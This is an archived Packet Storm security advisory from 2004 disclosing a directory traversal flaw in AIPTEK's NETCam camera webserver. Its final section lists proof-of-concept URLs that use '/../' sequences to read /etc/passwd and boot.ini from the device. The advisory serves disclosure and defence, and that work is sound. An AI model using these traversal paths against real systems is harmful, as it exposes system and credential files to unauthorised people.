NETCam.txt

2004-01-21T00:00:00
ID PACKETSTORM:32534
Type packetstorm
Reporter Rafel Ivgi
Modified 2004-01-21T00:00:00

Description

                                        
                                            `#######################################################################  
  
Application: NETCam webserver running NETCam Viewer 1.0.0.28  
Vendor: http://www.aiptek.com/  
Versions: <= 1.0.0.28  
Platforms: Windows/Unix  
Bug: Directory traversal bug  
Risk: High  
Exploitation: remote with browser  
Date: 14 Jan 2003  
Author: Rafel Ivgi, The-Insider  
e-mail: the_insider@mail.com  
web: http://theinsider.deep-ice.com  
  
#######################################################################  
  
1) Introduction  
2) Bug  
3) The Code  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
AIPTEK's cameras webserver is used as a webserver for watching security  
cameras remotly.  
It allows broadcasting live streaming video on the web through the built-in  
webserver.  
The server also allows live video capture.  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
The webserver uses no protection to avoid the directory traversal bug.  
The problem happens when the attacker uses the classic pattern "/../" that  
allows him to see and download any file in the remote system knowing the  
path.  
This allows any attacker to : Read and download any local file, and in most  
cases retrieve the machine's password files and invade it (using  
ssh,ftp,http,netbios,samba etc...).  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
http://<host>/../etc/passwd  
http://<host>/../../etc/passwd  
http://<host>/../../../boot.ini  
http://<host>/../../../../boot.ini  
  
#######################################################################  
  
---  
Rafel Ivgi, The-Insider  
http://theinsider.deep-ice.com  
  
"Things that are unlikeable, are NOT impossible."  
`